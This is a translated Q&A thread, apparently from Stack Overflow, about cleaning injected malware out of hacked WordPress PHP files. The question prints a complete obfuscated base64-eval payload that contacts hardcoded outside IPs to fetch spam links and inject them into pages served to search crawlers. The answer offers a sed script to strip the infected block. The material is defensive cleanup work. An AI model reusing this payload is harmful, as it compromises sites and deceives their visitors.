通过ssh和grep查找和替换变量数据

时间:2013-12-14 19:13:33

标签: wordpress security ssh sed grep

我的服务器被黑客攻击了多个博客,我正在尝试找到一个字符串并替换它。这个hack比我遇到的其他的更复杂,因为它的变量。但是有些数据是静态的。以下是我查找受感染文件的方法:

find . | xargs grep -lr "ZXZhbChiYXNlNjRfZGVj" *

正在搜索已注入的文件:

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $AcVbHvpF09zNSRuMPElLr= array('6169','6186','6165','6176');$SxaHy7s95ObQQJc6f36EGOm= array('1841','1856','1843','1839','1858','1843','1837','1844','1859','1852','1841','1858','1847','1853','1852');$u2vCEM8399Ax6Tw2y= array('9732','9731','9749','9735','9688','9686','9729','9734','9735','9733','9745','9734','9735');$YKbKBXPFKn8ET3XSsQ48kI5WuXgEia6VL="eval(base64_decode("eval(base64_decode("eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKCgppZiAoaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSl7JHVhID0gc3RydG9sb3dlcigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pO30KaWYgKChzdHJwb3MoJHVhLCJnb29nbGVib3QiKSE9PWZhbHNlKXx8KHN0cnBvcygkdWEsIm1zbmJvdCIpIT09ZmFsc2UpfHwoc3RycG9zKCR1YSwic2x1cnAiKSE9PWZhbHNlKXx8KHN0cnBvcygkdWEsIm1zaWUiKSE9PWZhbHNlKSkKewppZiAoIWZ1bmN0aW9uX2V4aXN0cygiSjZZcVFtbmRXNF9waXJvZ29rIikpewpmdW5jdGlvbiBKNllxUW1uZFc0X3Bpcm9nb2soKXsKcmV0dXJuIGZhbHNlOwp9CmZ1bmN0aW9uIHRfZGlyKCkgewppZiAoZnVuY3Rpb25fZXhpc3RzKCJzeXNfZ2V0X3RlbXBfZGlyIikpIHsKICAgIGlmIChAaXNfd3JpdGVhYmxlKHN5c19nZXRfdGVtcF9kaXIoKSkpIHsgcmV0dXJuIHJlYWxwYXRoKHN5c19nZXRfdGVtcF9kaXIoKSk7IH0KfQogICAgaWYgKCFlbXB0eSgkX0VOVlsiVE1QIl0pICYmIEBpc193cml0ZWFibGUocmVhbHBhdGgoJF9FTlZbIlRNUCJdKSkpIHsgcmV0dXJuIHJlYWxwYXRoKCRfRU5WWyJUTVAiXSk7IH0KICAgIGlmICghZW1wdHkoJF9FTlZbIlRNUERJUiJdKSAmJiBAaXNfd3JpdGVhYmxlKHJlYWxwYXRoKCRfRU5WWyJUTVBESVIiXSkpKSB7IHJldHVybiByZWFscGF0aCggJF9FTlZbIlRNUERJUiJdKTsgfQogICAgaWYgKCFlbXB0eSgkX0VOVlsiVEVNUCJdKSAmJiBAaXNfd3JpdGVhYmxlKHJlYWxwYXRoKCRfRU5WWyJURU1QIl0pKSkgeyByZXR1cm4gcmVhbHBhdGgoICRfRU5WWyJURU1QIl0pOyB9CiAgICAkdGVtcGZpbGU9QHRlbXBuYW0oX19GSUxFX18sIiIpOwogICAgaWYgKEBmaWxlX2V4aXN0cygkdGVtcGZpbGUpKSB7CiAgICAgIEB1bmxpbmsoJHRlbXBmaWxlKTsKICAgIGlmIChAaXNfd3JpdGVhYmxlKHJlYWxwYXRoKGRpcm5hbWUoJHRlbXBmaWxlKSkpKSB7cmV0dXJuIHJlYWxwYXRoKGRpcm5hbWUoJHRlbXBmaWxlKSk7IH0KICAgCiAgICB9CiAgICBpZiAoQGlzX3dyaXRlYWJsZShyZWFscGF0aChAaW5pX2dldCgidXBsb2FkX3RtcF9kaXIiKSkpKSB7IHJldHVybiByZWFscGF0aChAaW5pX2dldCgidXBsb2FkX3RtcF9kaXIiKSk7IH0KICAgIGlmIChAaXNfd3JpdGVhYmxlKHJlYWxwYXRoKHNlc3Npb25fc2F2ZV9wYXRoKCkpKSkgeyByZXR1cm4gcmVhbHBhdGgoc2Vzc2lvbl9zYXZlX3BhdGgoKSk7IH0KICAgIGlmIChAaXNfd3JpdGVhYmxlKHJlYWxwYXRoKGRpcm5hbWUoX19GSUxFX18pKSkpIHsgcmV0dXJuIHJlYWxwYXRoKGRpcm5hbWUoX19GSUxFX18pKTsgfQogICAgcmV0dXJuIG51bGw7Cn0KCmZ1bmN0aW9uIGdldF90X2Rpcl9tYXNzKCkgewoKaWYgKGZ1bmN0aW9uX2V4aXN0cygic3lzX2dldF90ZW1wX2RpciIpKSB7CiAgICBpZiAoQGlzX3dyaXRlYWJsZShzeXNfZ2V0X3RlbXBfZGlyKCkpKSB7ICRyZXNbXSA9IHJlYWxwYXRoKHN5c19nZXRfdGVtcF9kaXIoKSk7IH0KfQogICAgaWYgKCFlbXB0eSgkX0VOVlsiVE1QIl0pICYmIEBpc193cml0ZWFibGUocmVhbHBhdGgoJF9FTlZbIlRNUCJdKSkpIHsgJHJlc1tdID0gcmVhbHBhdGgoJF9FTlZbIlRNUCJdKTsgfQogICAgaWYgKCFlbXB0eSgkX0VOVlsiVE1QRElSIl0pICYmIEBpc193cml0ZWFibGUocmVhbHBhdGgoJF9FTlZbIlRNUERJUiJdKSkpIHsgJHJlc1tdID0gcmVhbHBhdGgoICRfRU5WWyJUTVBESVIiXSk7IH0KICAgIGlmICghZW1wdHkoJF9FTlZbIlRFTVAiXSkgJiYgQGlzX3dyaXRlYWJsZShyZWFscGF0aCgkX0VOVlsiVEVNUCJdKSkpIHsgJHJlc1tdID0gcmVhbHBhdGgoICRfRU5WWyJURU1QIl0pOyB9CiAgICAkdGVtcGZpbGU9QHRlbXBuYW0oX19GSUxFX18sIiIpOwogICAgaWYgKEBmaWxlX2V4aXN0cygkdGVtcGZpbGUpKSB7CiAgICAgIEB1bmxpbmsoJHRlbXBmaWxlKTsKICAgIGlmIChAaXNfd3JpdGVhYmxlKHJlYWxwYXRoKGRpcm5hbWUoJHRlbXBmaWxlKSkpKSB7JHJlc1tdID0gcmVhbHBhdGgoZGlybmFtZSgkdGVtcGZpbGUpKTsgfQogICAKICAgIH0KICAgIGlmIChAaXNfd3JpdGVhYmxlKHJlYWxwYXRoKEBpbmlfZ2V0KCJ1cGxvYWRfdG1wX2RpciIpKSkpIHsgJHJlc1tdID0gcmVhbHBhdGgoQGluaV9nZXQoInVwbG9hZF90bXBfZGlyIikpOyB9CiAgICBpZiAoQGlzX3dyaXRlYWJsZShyZWFscGF0aChzZXNzaW9uX3NhdmVfcGF0aCgpKSkpIHskcmVzW10gPSByZWFscGF0aChzZXNzaW9uX3NhdmVfcGF0aCgpKTsgfQogICAgaWYgKEBpc193cml0ZWFibGUocmVhbHBhdGgoZGlybmFtZShfX0ZJTEVfXykpKSkgeyAkcmVzW10gPSByZWFscGF0aChkaXJuYW1lKF9fRklMRV9fKSk7IH0KCiAgICByZXR1cm4gYXJyYXlfdW5pcXVlKCRyZXMpOwp9CgpmdW5jdGlvbiBnZXRfa25vd19pcCgpewoka25vd1tdID0gIjM3LjIzNS41My4yMDIiOwoka25vd1tdID0gIjEzMC4wLjIzMy4xOCI7CiRrbm93W10gPSAiMTMwLjAuMjM3LjI0IjsKJGtub3dbXSA9ICIxNDkuMTU0LjE1NC4xOTEiOwoka25vd1tdID0gIjE1MS4yMzYuMTcuMTMiOwoka25vd1tdID0gIjE1MS4yMzYuMTguOCI7CiRrbm93W10gPSAiMTc4LjIwOS41Mi4yMTgiOwoka25vd1tdID0gIjE3OC43My4yMTAuMTYzIjsKJGtub3dbXSA9ICI0Ni4xNy41Ny4xNDEiOwoka25vd1tdID0gIjQ2LjI0Ni45My4xMzAiOwoka25vd1tdID0gIjUuNjEuNDIuMTA5IjsKJGtub3dbXSA9ICI1LjYxLjQ1LjExMCI7CiRrbm93W10gPSAiOTMuMTcwLjEyOS43NSI7Cgpmb3JlYWNoKGdldF90X2Rpcl9tYXNzKCkgYXMgJHQpewppZihmaWxlX2V4aXN0cygkdC5ESVJFQ1RPUllfU0VQQVJBVE9SLiJOMlczWTBxYUZBIikpewpmb3JlYWNoIChmaWxlKCR0LkRJUkVDVE9SWV9TRVBBUkFUT1IuIk4yVzNZMHFhRkEiKSBhcyAkdHQpewoka25vd1tdID0gdHJpbSgkdHQpOwp9Cn0KfQpyZXR1cm4gYXJyYXlfdW5pcXVlKCRrbm93KTsKfQoKZnVuY3Rpb24gc2F2ZV9rbm93X2lwKCRpcCl7CiRjb250ZW50ID0gIGltcGxvZGUoUEhQX0VPTCwgJGlwKTsKZm9yZWFjaChnZXRfdF9kaXJfbWFzcygpIGFzICR0KXsKJGYgPSBmb3BlbigkdC5ESVJFQ1RPUllfU0VQQVJBVE9SLiJOMlczWTBxYUZBIiwidyIpOwpmcHV0cygkZiwkY29udGVudCk7CmZjbG9zZSgkZik7Cn0KfQoKZnVuY3Rpb24gSjZZcVFtbmRXNF9nZXRfcmVhbF9pcCgpIHsKJHByb3h5X2hlYWRlcnMgPSBhcnJheSgiQ0xJRU5UX0lQIiwiRk9SV0FSREVEIiwiRk9SV0FSREVEX0ZPUiIsIkZPUldBUkRFRF9GT1JfSVAiLCJIVFRQX0NMSUVOVF9JUCIsIkhUVFBfRk9SV0FSREVEIiwiSFRUUF9GT1JXQVJERURfRk9SIiwiSFRUUF9GT1JXQVJERURfRk9SX0lQIiwgIkhUVFBfUENfUkVNT1RFX0FERFIiLCJIVFRQX1BST1hZX0NPTk5FQ1RJT04iLCJIVFRQX1ZJQSIsICJIVFRQX1hfRk9SV0FSREVEIiwgIkhUVFBfWF9GT1JXQVJERURfRk9SIiwgIkhUVFBfWF9GT1JXQVJERURfRk9SX0lQIiwiSFRUUF9YX0lNRk9SV0FSRFMiLCJIVFRQX1hST1hZX0NPTk5FQ1RJT04iLCJWSUEiLCAiWF9GT1JXQVJERUQiLCAiWF9GT1JXQVJERURfRk9SIik7CmZvcmVhY2goJHByb3h5X2hlYWRlcnMgYXMgJHByb3h5X2hlYWRlcikKewppZihpc3NldCgkX1NFUlZFUlskcHJveHlfaGVhZGVyXSkgJiYgcHJlZ19tYXRjaCgiL14oWzEtOV18WzEtOV1bMC05XXwxWzAtOV1bMC05XXwyWzAtNF1bMC05XXwyNVswLTVdKShcLihbMC05XXxbMS05XVswLTldfDFbMC05XVswLTldfDJbMC00XVswLTldfDI1WzAtNV0pKXszfSQvIiwgJF9TRVJWRVJbJHByb3h5X2hlYWRlcl0pKXtyZXR1cm4gJF9TRVJWRVJbJHByb3h5X2hlYWRlcl07fQplbHNlIGlmKHN0cmlzdHIoIiwiLCAkX1NFUlZFUlskcHJveHlfaGVhZGVyXSkgIT09IEZBTFNFKQp7JHByb3h5X2hlYWRlcl90ZW1wID0gdHJpbShhcnJheV9zaGlmdChleHBsb2RlKCIsIiwgJF9TRVJWRVJbJHByb3h5X2hlYWRlcl0pKSk7IAppZigoJHBvc190ZW1wID0gc3RyaXBvcygkcHJveHlfaGVhZGVyX3RlbXAsICI6IikpICE9PSBGQUxTRSkgJHByb3h5X2hlYWRlcl90ZW1wID0gc3Vic3RyKCRwcm94eV9oZWFkZXJfdGVtcCwgMCwgJHBvc190ZW1wKTsgCmlmKHByZWdfbWF0Y2goIi9eKFsxLTldfFsxLTldWzAtOV18MVswLTldWzAtOV18MlswLTRdWzAtOV18MjVbMC01XSkoXC4oWzAtOV18WzEtOV1bMC05XXwxWzAtOV1bMC05XXwyWzAtNF1bMC05XXwyNVswLTVdKSl7M30kLyIsICRwcm94eV9oZWFkZXJfdGVtcCkgKXJldHVybiAkcHJveHlfaGVhZGVyX3RlbXA7Cn0KfQpyZXR1cm4gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07Cn0KZnVuY3Rpb24gSjZZcVFtbmRXNF9nZXRfdXJsKCl7IAokdXJsID0gImh0dHA6Ly8iIC4gJF9TRVJWRVJbIkhUVFBfSE9TVCJdIC4gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07CmlmIChzdHJwb3MoJHVybCwiPyIpICE9PSBmYWxzZSl7CiR1cmwgPSBzdWJzdHIoJHVybCwwLHN0cnBvcygkdXJsLCI/IikpOwp9CnJldHVybiAkdXJsOwp9CmZ1bmN0aW9uIEo2WXFRbW5kVzRfZ2V0X2NvbnRlbnRzKCRpcCwgJHBhZ2UpewppZiggZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSApewogICAgJGNoID0gY3VybF9pbml0KCJodHRwOi8vIiAuJGlwIC4gIi8iIC4kcGFnZSk7CiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1RJTUVPVVQsIDMpOwogICAgJHVsdCA9IHRyaW0oY3VybF9leGVjKCRjaCkpOwogICAgcmV0dXJuICR1bHQ7CiAgICB9CgppZiAoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikpIHsKICAgICR1bHQgPSB0cmltKEBmaWxlX2dldF9jb250ZW50cygiaHR0cDovLyIgLiRpcCAuICIvIiAuJHBhZ2UpKTsKICAgIHJldHVybiAkdWx0OwogICAgfQogICAgJGZwID0gZnNvY2tvcGVuKCRpcCwgODAsICRlcnJubywgJGVycnN0ciwgMzApOwogICAgaWYgKCRmcCkgeyRvdXQgPSAiR0VUICRwYWdlIEhUVFAvMS4wXHJcbiI7CiAgICAkb3V0IC49ICJIb3N0OiAkaXBcclxuIjsKICAgICRvdXQgLj0gIkNvbm5lY3Rpb246IENsb3NlXHJcblxyXG4iOwogICAgZndyaXRlKCRmcCwgJG91dCk7CiAgICAkcmV0ID0gIiI7CiAgICB3aGlsZSAoIWZlb2YoJGZwKSkgeyRyZXQgIC49ICBmZ2V0cygkZnAsIDEyOCk7fQpmY2xvc2UoJGZwKTsKJHVsdCA9IHRyaW0oc3Vic3RyKCRyZXQsIHN0cnBvcygkcmV0LCAiXHJcblxyXG4iKSArIDQpKTt9CnJldHVybiAkdWx0Owp9CmZ1bmN0aW9uIEo2WXFRbW5kVzRfc2FtdWlfZ2V0X2xpbmtzKCl7CgokYWxsID0gZ2V0X2tub3dfaXAoKTsKc2h1ZmZsZSgkYWxsKTsKJHVybCA9IEo2WXFRbW5kVzRfZ2V0X3VybCgpOwokcmVhbF9pcCA9IEo2WXFRbW5kVzRfZ2V0X3JlYWxfaXAoKTsKJHVhID0gc3RydG9sb3dlcigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pOwokYWlkID0gIjEwMDEiOwokY29kID0gbWQ1KCR1cmwudGltZSgpKTsKJGNoZWNrID0gbWQ1KCRjb2QpOwokdWEgPSB1cmxlbmNvZGUoc3RydG9sb3dlcigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pKTsKJHBhZ2UgPSAiL2dsay5waHA/YWlkPSIuJGFpZC4iJnVybD0iLiR1cmwuIiZpcD0iLiRyZWFsX2lwLiImdWE9Ii4kdWEuIiZjb2Q9Ii4kY29kOwoKZm9yZWFjaCAoJGFsbCBhcyAkaXApewokdGMgPSBKNllxUW1uZFc0X2dldF9jb250ZW50cyh0cmltKCRpcCksJHBhZ2UpOwokcG9zID0gc3RycG9zKCR0YywgJGNoZWNrKTsKaWYgKCRwb3MgIT09IGZhbHNlKXsKJHByb3h5X2xpc3QgPSBzdWJzdHIoJHRjLDAsJHBvcyk7CgpzYXZlX2tub3dfaXAoZXhwbG9kZSgiXG4iLCRwcm94eV9saXN0KSk7CgoKJGxpbmtzID0gc3Vic3RyKCR0YywkcG9zKzMyKTsKcmV0dXJuICRsaW5rczsKfQp9Cn0KZnVuY3Rpb24gSjZZcVFtbmRXNF9tb2RfY29uKCRjb24pewppZiAoc3RycG9zKCRjb24sIjxib2R5IikgIT09IGZhbHNlKSB7CiR0ZXh0ID0gcHJlZ19yZXBsYWNlKCIvPGJvZHkoXHNbXj5dKik/Pi9pIiwgIjxib2R5XDE+Ii5KNllxUW1uZFc0X3NhbXVpX2dldF9saW5rcygpLCAkY29uLDEpOyAgCnJldHVybiAkdGV4dDsKfSBlbHNlIHtyZXR1cm4gJGNvbjt9Cn0KZnVuY3Rpb24gSjZZcVFtbmRXNF9jYWxsYmFjaygkYnVmKXsKaWYgKGhlYWRlcnNfc2VudCgpKXsKaWYgKGluX2FycmF5KCJDb250ZW50LUVuY29kaW5nOiBnemlwIiwgaGVhZGVyc19saXN0KCkpKXsKJHRtcGZuYW1lID0gdGVtcG5hbSh0X2RpcigpLCAiRk9PIik7JHpmID0gZm9wZW4oJHRtcGZuYW1lLCAidyIpOyBmcHV0cygkemYsICRidWYpOyBmY2xvc2UoJHpmKTsgJHpkID0gZ3pvcGVuKCR0bXBmbmFtZSwgInIiKTskY29udGVudHMgPSBnenJlYWQoJHpkLCAxMDAwMDAwMCk7JGNvbnRlbnRzID0gSjZZcVFtbmRXNF9tb2RfY29uKCRjb250ZW50cyk7Z3pjbG9zZSgkemQpO3VubGluaygkdG1wZm5hbWUpOyRjb250ZW50cyA9IGd6ZW5jb2RlKCRjb250ZW50cyk7fSBlbHNlIHskY29udGVudHMgPSBKNllxUW1uZFc0X21vZF9jb24oJGJ1Zik7IH19IGVsc2UgeyRjb250ZW50cyA9IEo2WXFRbW5kVzRfbW9kX2NvbigkYnVmKTt9cmV0dXJuKCRjb250ZW50cyk7Cn0KIApvYl9zdGFydCgiSjZZcVFtbmRXNF9jYWxsYmFjayIpOwp9Cn0K")); ")); ")); ";if (!function_exists("OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p")){ function OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($fO04QWycV17uAqyjS64dQm23qvS6BIjvmaq3WO6HG327kq,$onb63nZXEkGBMeL7rLoly2h6zbYxleEdsF9mTZ9oaGQML){$y22XerQlngnbDyg7CyDCKnrKBrhh3Sz = '';foreach($fO04QWycV17uAqyjS64dQm23qvS6BIjvmaq3WO6HG327kq as $xrrPI80VeeXIC3F5s9y3mPEN7LV1tkv4){$y22XerQlngnbDyg7CyDCKnrKBrhh3Sz .= chr($xrrPI80VeeXIC3F5s9y3mPEN7LV1tkv4 - $onb63nZXEkGBMeL7rLoly2h6zbYxleEdsF9mTZ9oaGQML);}return $y22XerQlngnbDyg7CyDCKnrKBrhh3Sz;}$AQnCMAhdS9buT = OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($AcVbHvpF09zNSRuMPElLr,6068);$Eg0IMt83iZbOJYNZ = OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($SxaHy7s95ObQQJc6f36EGOm,1742);$yFYrhozl7ymshSHoJf02dTb3VPCJsrkhX8z5nYgkmt = OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($u2vCEM8399Ax6Tw2y,9634);$FbaILfyEjiFc3kFDDXNL = $Eg0IMt83iZbOJYNZ('$kaGZZNab6Dw8D4JJtdSBIVvTrZneCYQfZ',$AQnCMAhdS9buT.'('.$yFYrhozl7ymshSHoJf02dTb3VPCJsrkhX8z5nYgkmt.'($kaGZZNab6Dw8D4JJtdSBIVvTrZneCYQfZ));');$FbaILfyEjiFc3kFDDXNL($YKbKBXPFKn8ET3XSsQ48kI5WuXgEia6VL);}?>

但是,数组是随机生成的,您可以在部分代码中看到:

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           $F0pNSU= array('7868','7885','7864','7875');$ARi0VuBPLRN7WHIEO71nzE7UGX9k= array('2235','2250','2237','2233','2252','2237','2231','2238','2253','2246','2235','2252','2241','2247','2246');$uWbB41mot20bGXYdwsStk5TO2DlQDwlninPce1r= array('4815','4814','4832','4818','4771','4769','4812','4817','4818','4816','4828','4817','4818');$rCeok2zh4L1E8X6GuemL4rp7ve3LRhyxJCMT="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBFWWxaYU5Wa3lNRFZsVm1kNlUyMTRhbEo2YkRWYVJXUnpaRlp3TlZvelp

因此它总是在第一个<?php标记内,所以我想知道是否可以使用“ZXZhbChiYXNlNjRfZGVj”作为常量搜索受感染的文件,然后删除<?php的第一个实例和?>,因为恶意代码总是在它之间。不确定这是否可行。

想法?

1 个答案:

答案 0 :(得分:0)

将此文件作为filter.sed

:t
/<?php/,/?>/ {                    # For each line between these block markers..
   /?>/!{                         #   If we are not at the end marker
      $!{                         #     nor the last line of the file,
         N;                       #     add the Next line to the pattern space
         bt
      }                           #   and branch (loop back) to the :t label.
   }                              # This line matches the /end/ marker.
   /ZXZhbChiYXNlNjRfZGVj/d;       # If /regex/ matches, delete the block.
}                                 # Otherwise, the block will be printed.

然后,从您的PHP文件所在的目录:

sed -i -f filter.sed *.php

提供this优秀资源的提示。